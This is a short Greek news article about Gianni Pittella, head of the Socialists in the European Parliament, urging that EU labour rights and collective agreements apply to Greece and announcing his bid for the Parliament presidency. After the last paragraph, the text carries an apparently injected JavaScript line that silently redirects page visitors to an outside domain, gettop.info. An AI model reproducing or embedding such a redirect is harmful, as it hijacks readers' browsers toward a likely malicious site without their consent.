Πιτέλα: Να ισχύσει και για την Ελλάδα το κοινοτικό κεκτημένο στα εργασιακά

0
8

 

Την άποψη ότι πρέπει να ισχύσει και για την Ελλάδα το κοινοτικό κεκτημένο στα εργασιακά, εξέφρασε ο πρόεδρος της ομάδας των Σοσιαλιστών στο Ευρωπαϊκό Κοινοβούλιο, Τζιάνι Πιτέλα, σε δηλώσεις του προς το ΑΠΕ-ΜΠΕ, λίγο μετά τη συνάντηση με την υπουργό Εργασίας, Κοινωνικής Ασφάλισης και Κοινωνικής Αλληλεγγύης Έφη Αχτσιόγλου.

Ο Τζιάνι Πιτέλα χαρακτήρισε «παραγωγική» και «θετική» τη συνάντησή του με την Ελληνίδα υπουργό Εργασίας και τόνισε ότι συμμερίζεται την άποψη ότι πρέπει να διασφαλιστεί πως δεν θα υπάρξει καμία «τιμωρητική» εφαρμογή του μνημονίου για την Ελλάδα.

«Πρέπει να διασφαλιστεί ότι η Ελλάδα δεν θα αποτελέσει την εξαίρεση στην ΕΕ όσον αφορά τα εργασιακά δικαιώματα», ανέφερε χαρακτηριστικά ο Τζ. Πιτέλα και προσέθεσε ότι «οι συλλογικές συμβάσεις είναι ένα σημαντικό κεκτημένο, το οποίο πρέπει να εφαρμοστεί και στην Ελλάδα».

Την ανάγκη να διατηρηθεί η αρχή της ισορροπίας στην κατανομή των προεδριών των ευρωπαϊκών θεσμών στις πολιτικές οικογένειες, επεσήμανε στις δηλώσεις του στο ΑΜΠΕ ο Πρόεδρος της ομάδας των Σοσιαλιστών Τζιάνι Πιτέλα, μία μέρα μετά την ανακοίνωση της υποψηφιότητάς του για την Προεδρία του Ευρωπαϊκού Κοινοβουλίου.

Ο Τζ. Πιτέλα χαρακτήρισε «μη αποδεκτή» την «μονοπώληση» των τριών θεσμικών αξιωμάτων στην ΕΕ από το Ευρωπαϊκό Λαϊκό Κόμμα (ΕΛΚ), την οποία, όπως είπε, θέλει «να σπάσει», θέτοντας την υποψηφιότητά του για την Προεδρία του Ευρωπαϊκού Κοινοβουλίου τον Ιούνιο του 2017.

Ο Τζ. Πιτέλα ανέφερε επίσης ότι χθες είχε τηλεφωνικές συνομιλίες με σοσιαλιστές Ευρωπαίους ηγέτες, αρχής γενομένης με τον Ιταλό πρωθυπουργό Ματέο Ρέντσι και τον Γάλλο Πρόεδρο Φρανσουά Ολάντ, οι οποίοι δήλωσαν τη στήριξή τους στην υποψηφιότητά του.

Σημείωσε επίσης ότι οι επαφές με Ευρωπαίους σοσιαλιστές, αλλά και με τους Πράσινους θα συνεχιστούν προκειμένου να λάβει μία ευρύτερη στήριξη.

Καταλήγοντας ο Τζ. Πιτέλα άφησε να εννοηθεί ότι μπορεί να διακυβευθεί και η συνέχιση της θητείας του Ντόναλντ Τουσκ στην Προεδρία του Συμβουλίου της ΕΕ, η οποία, όπως και αυτή του Προέδρου της Ευρωβουλής, λήγει τον Ιούνιο του 2017, οπότε και θα πρέπει να αποφασιστεί αν θα παραταθεί για δυόμισι επιπλέον χρόνια ή όχι. Σημειώνεται ότι ο Ντόναλντ Τουσκ ανήκει στο Ευρωπαϊκό Λαϊκό Κόμμα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here